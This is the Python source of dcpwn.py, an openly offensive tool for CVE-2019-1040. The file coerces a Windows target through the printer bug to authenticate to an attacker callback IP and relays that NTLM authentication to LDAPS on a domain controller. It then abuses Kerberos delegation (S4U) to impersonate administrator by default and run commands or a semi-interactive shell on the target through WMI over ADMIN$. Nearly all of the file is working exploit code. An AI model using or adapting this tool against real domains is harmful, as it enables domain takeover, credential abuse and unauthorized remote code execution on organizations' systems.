dcpwn.py

#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import ssl
import argparse
import logging
import sys
import time
import config
import os
from comm import logger
from comm.ntlmrelayx.servers import SMBRelayServer
from comm.ntlmrelayx.utils.config import NTLMRelayxConfig
from comm.ntlmrelayx.utils.targetsutils import TargetsProcessor
from comm.ntlmrelayx.clients import PROTOCOL_CLIENTS
from comm.ntlmrelayx.attacks import PROTOCOL_ATTACKS
from multiprocessing import Manager
from threading import Thread, Lock
from comm.printer import PrinterBug
from comm.getST import GETST
from comm.wmiexec import WMIEXEC
from comm.hostsmodify import add_hostname
from comm.hostsmodify import del_hostname

# Init logging
logger.init()
logging.getLogger().setLevel(logging.INFO)
start = time.time()


def banner():
	banner = R"""                              
        ( )                                
       _| |   ___  _ _    _   _   _   ___  
     /'_` | /'___)( '_`\ ( ) ( ) ( )/' _ `\
    ( (_| |( (___ | (_) )| \_/ \_/ || ( ) |
    `\__,_)`\____)| ,__/'`\___x___/'(_) (_)
                  | |                      
                  (_)           version:0.1                                                                                       
"""
	print(banner)
	print("\n   \033[1;33mCVE-2019-1040 with Kerberos delegation \033[0m")
	print("   Author: evi1cg (zuotonghk@gmail.com)\n")

def startServers(passargs):
    ldaps_server = passargs.ldaps
    PoppedDB		= Manager().dict()	# A dict of PoppedUsers
    PoppedDB_Lock	= Lock()			# A lock for opening the dict
    c = NTLMRelayxConfig()
    c.setProtocolClients(PROTOCOL_CLIENTS)
    c.setTargets(TargetsProcessor(singleTarget=str("ldaps://"+ldaps_server), protocolClients=PROTOCOL_CLIENTS))
    c.setOutputFile(None)
    c.setEncoding('ascii')
    c.setMode('RELAY')
    c.setAttacks(PROTOCOL_ATTACKS)
    c.setLootdir('.')
    c.setInterfaceIp("0.0.0.0")
    c.setExploitOptions(True)
    c.setSMB2Support(True)
    c.delegateaccess = True
    c.PoppedDB 		= PoppedDB 		# pass the poppedDB to the relay servers
    c.PoppedDB_Lock = PoppedDB_Lock # pass the poppedDB to the relay servers
    s = SMBRelayServer(c)
    s.start()
    logging.info("Relay servers started, waiting for connection....")
    try:
        status = exploit(passargs)
        if status:
            exp = Thread(target=checkauth, args=(passargs,))
            exp.daemon = True
            exp.start()
            try:
                while exp.isAlive():
                    pass
            except KeyboardInterrupt as e:
                logging.info("Shutting down...")
                s.server.shutdown()
        else:
            logging.error("Error in exploit, Shutting down...")
            s.server.shutdown()
    except Exception as e:
        print(e)
        logging.error("Error in exploit, Shutting down...")
        logging.info("Shutting down...")
        s.server.shutdown()


def checkauth(passargs):
    getpriv = config.get_priv()
    dcync = config.get_dcsync()
    logging.info("Checking privs...")
    while True:
        if getpriv == True:
            if dcync:
                break
            else:
                s4u2pwnage(passargs)
            break
        else:
            getpriv = config.get_priv()
            dcync = config.get_dcsync()
            tmp = time.time() - start
            if tmp > passargs.timeout:
                logging.error("Time Out. exiting...")
                break


def s4u2pwnage(passargs):
    logging.info("Executing s4u2pwnage..")
    username = config.get_newUser()
    password = config.get_newPassword()
    domain = passargs.domain
    targetName = config.get_targetName()
    if logging.getLogger().level == logging.DEBUG:
        passargs.debug = True
    passargs.aesKey = None
    passargs.hashes = None
    passargs.nooutput = False
    passargs.targetName = targetName
    thostname = '{}.{}'.format(targetName.replace("$", ""), domain)
    passargs.spn = 'cifs/{}'.format(thostname)
    try:
        executer = GETST(username, password, domain, passargs)
        executer.run()
        ccachefile = config.get_ccache()
        if os.path.exists(ccachefile):
            logging.info('Loading ticket')
            os.environ['KRB5CCNAME'] = config.get_ccache()
        else:
            logger.info("No ticket find. exit..")
            sys.exit(1)
        try:
            add_hostname(thostname, passargs.target)
            if len(passargs.command) > 1:
                passargs.nooutput = True
            executer = WMIEXEC(' '.join(passargs.command), passargs.impersonate, '', domain, passargs.hashes, passargs.aesKey,
                               passargs.share, passargs.nooutput, True, passargs.dc_ip)
            executer.run(thostname)
            os.remove(ccachefile)
            del_hostname(thostname, passargs.target)
            logging.critical("Exit...")
        except KeyboardInterrupt as e:
            logging.error(str(e))
        except Exception as e:
            if logging.getLogger().level == logging.DEBUG:
                import traceback
                traceback.print_exc()
            logging.error(str(e))
            sys.exit(1)
    except Exception as e:
        if logging.getLogger().level == logging.DEBUG:
            import traceback
            traceback.print_exc()
        print(e)

def exploit(args):
    username = args.user
    password = args.password
    domain = args.domain
    port = args.smb_port
    lookup = PrinterBug(username, password, domain, int(
        port), args.hashes, args.callback_ip)
    try:
        check = lookup.dump(args.target)
        if check:
            return True
    except KeyboardInterrupt:
        return False




def main():
    parser = argparse.ArgumentParser(
        description='CVE-2019-1040 with Kerberos delegation')
    parser.add_argument("-u", "--user", metavar='USERNAME', help="username for authentication")
    parser.add_argument("-p", "--password", metavar='PASSWORD', help="Password for authentication, will prompt if not specified and no NT:NTLM hashes are supplied")
    parser.add_argument('--hashes', action='store', help='LM:NLTM hashes')
    parser.add_argument("-d", "--domain", required=True, metavar='DOMAIN',
                        help="domain the user is in (FQDN or NETBIOS domain name)")
    parser.add_argument('--smb-port', choices=['139', '445'], nargs='?', default='445', metavar="destination port",
                  help='Destination port to connect to SMB Server')
    parser.add_argument("--callback-ip", required=True, help="Attacker hostname or IP")
    parser.add_argument("--ldaps", required=True, help="Hostname or ldaps server")
    parser.add_argument("--dc-ip", required=True,
                        help="Domain controller ip address")
    parser.add_argument("--timeout", default='30',type=int, help='timeout in seconds')
    parser.add_argument('--impersonate', action="store",  default='administrator', help='target username that will be impersonated (thru S4U2Self)'
                                                              ' for quering the ST. Keep in mind this will only work if '
                                                              'the identity provided in this scripts is allowed for '
                                                              'delegation to the SPN specified')
    parser.add_argument("-t", "--target", type=str, metavar='Target', required=True,
                        help="Hostname/IP of the target server")
    parser.add_argument('-share', action='store', default='ADMIN$', help='share where the output will be grabbed from '
                        '(default ADMIN$)')
    parser.add_argument('--command', nargs='*', default=' ', help='command to execute at the target. If empty it will '
                        'launch a semi-interactive shell')
    parser.add_argument("--debug", action='store_true',help='Enable debug output')
    passargs = parser.parse_args()
    startServers(passargs)

if __name__ == '__main__':
    banner()
    if not os.geteuid() == 0:
        logging.warning("dcpwn must be run as root.")
        sys.exit(-1)
    else:
        main()